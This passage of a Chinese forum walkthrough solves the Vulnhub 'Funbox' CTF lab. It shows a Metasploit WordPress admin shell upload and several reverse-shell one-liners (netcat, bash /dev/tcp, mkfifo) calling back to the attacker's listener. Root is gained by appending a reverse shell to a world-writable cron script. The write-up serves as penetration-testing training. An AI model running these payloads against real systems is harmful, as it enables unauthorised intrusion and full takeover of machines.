53. msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
54. USERNAME => admin
55. msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD iubire
56. PASSWORD => iubire
57. msf6 exploit(unix/webapp/wp_admin_shell_upload) > run
59. [-] Handler failed to bind to 192.168.56.146:5555:-  -
60. [-] Handler failed to bind to 0.0.0.0:5555:-  -
61. [-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:5555).
62. [*] Exploit completed, but no session was created.
63. msf6 exploit(unix/webapp/wp_admin_shell_upload) > run
65. [*] Started reverse TCP handler on 192.168.56.146:5555
66. [-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
67. [*] Exploit completed, but no session was created.
68. msf6 exploit(unix/webapp/wp_admin_shell_upload) >
69. msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS funbox.fritz.box
70. RHOSTS => funbox.fritz.box
71. msf6 exploit(unix/webapp/wp_admin_shell_upload) > run
73. [*] Started reverse TCP handler on 192.168.56.146:5555
74. [*] Authenticating with WordPress using admin:iubire...
75. [+] Authenticated with WordPress
76. [*] Preparing payload...
77. [*] Uploading payload...
78. [*] Executing the payload at /wp-content/plugins/RDbPTmaIBL/GUpqQZSzdR.php...
79. [*] Sending stage (39927 bytes) to 192.168.56.164
80. [+] Deleted GUpqQZSzdR.php
81. [+] Deleted RDbPTmaIBL.php
82. [+] Deleted ../RDbPTmaIBL
83. [*] Meterpreter session 1 opened (192.168.56.146:5555 -> 192.168.56.164:54050) at 2023-01-10 21:47:30 -0500
85. meterpreter > shell
86. Process 2443 created.
87. Channel 0 created.
88. sh: 0: getcwd() failed: No such file or directory
89. sh: 0: getcwd() failed: No such file or directory
90. id
91. uid=33(www-data) gid=33(www-data) groups=33(www-data)
92. which nc
93. sh: 0: getcwd() failed: No such file or directory
94. /usr/bin/nc
95. nc -e /bin/bash 192.168.56.146 6666
96. nc: invalid option -- 'e'
97. usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
98.           [-m minttl] [-O length] [-P proxy_username] [-p source_port]
99.           [-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit] [-w timeout]
100.           [-X proxy_protocol] [-x proxy_address[:port]]           [destination] [port]
101. id
102. uid=33(www-data) gid=33(www-data) groups=33(www-data)
103. bash -i >& /dev/tcp/192.168.56.146/6666 0>&1
104. /bin/sh: 6: Syntax error: Bad fd number
105. meterpreter > bash -c 'bash -i >& /dev/tcp/192.168.56.146/6666 0>&1'
106. [-] Unknown command: bash
107. meterpreter > shell
108. Process 2458 created.
109. Channel 1 created.
110. sh: 0: getcwd() failed: No such file or directory
111. sh: 0: getcwd() failed: No such file or directory
112. id
113. uid=33(www-data) gid=33(www-data) groups=33(www-data)
114. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.146 6666 >/tmp/f
115. rm: cannot remove '/tmp/f': No such file or directory

复制代码

在meterpreter shell基础上spawn一个新的shell

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
2. └─$  sudo nc -nlvp 6666
3. listening on [any] 6666 ...
4. connect to [192.168.56.146] from (UNKNOWN) [192.168.56.164] 56812
5. sh: 0: getcwd() failed: No such file or directory
6. /bin/sh: 0: can't access tty; job control turned off
7. $ which python
8. sh: 0: getcwd() failed: No such file or directory
9. /usr/bin/python
10. $ python -c 'import pty;pty.spawn("/bin/bash")'
11. shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory

复制代码

提权

1. ww-data@funbox:/home/funny$ cat .reminder.sh
2. cat .reminder.sh
3. #!/bin/bash
4. echo "Hi Joe, the hidden backup.sh backups the entire webspace on and on. Ted, the new admin, test it in a long run." | mail -s"Reminder" joe@funbox

复制代码

.reminder.sh提醒backup.sh为计划任务，而该文件任何人都有可写权限

1. www-data@funbox:/home/funny$ cat .backup.sh
2. cat .backup.sh
3. #!/bin/bash
4. tar -cf /home/funny/html.tar /var/www/html
5. www-data@funbox:/home/funny$ which nano
6. which nano
7. /usr/bin/nano
8. www-data@funbox:/home/funny$ nano .backup.sh
9. nano .backup.sh
10. Error opening terminal: unknown.
11. www-data@funbox:/home/funny$ echo 'bash -i >& /dev/tcp/192.168.56.146/9999 0>&1' >> .backup.sh
12. <>& /dev/tcp/192.168.56.146/9999 0>&1' >> .backup.sh
13. www-data@funbox:/home/funny$ cat .backup.sh
14. cat .backup.sh
15. #!/bin/bash
16. tar -cf /home/funny/html.tar /var/www/html
17. bash -i >& /dev/tcp/192.168.56.146/9999 0>&1

复制代码

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
2. └─$ sudo nc -nlvp 9999                                         
3. [sudo] password for kali:
4. listening on [any] 9999 ...
5. connect to [192.168.56.146] from (UNKNOWN) [192.168.56.164] 35070
6. bash: cannot set terminal process group (2518): Inappropriate ioctl for device
7. bash: no job control in this shell
8. root@funbox:~# id
9. id
10. uid=0(root) gid=0(root) groups=0(root)
11. root@funbox:~# cd /root
12. cd /root
13. root@funbox:~# ls
14. ls
15. flag.txt
16. mbox
17. snap
18. root@funbox:~# cat flag.txt
19. cat flag.txt
20. Great ! You did it...
21. FUNBOX - made by @0815R2d2
22. root@funbox:~#

复制代码

至此实现了root提权，并拿到了root flag

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！

---

欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)

Powered by Discuz! X3.4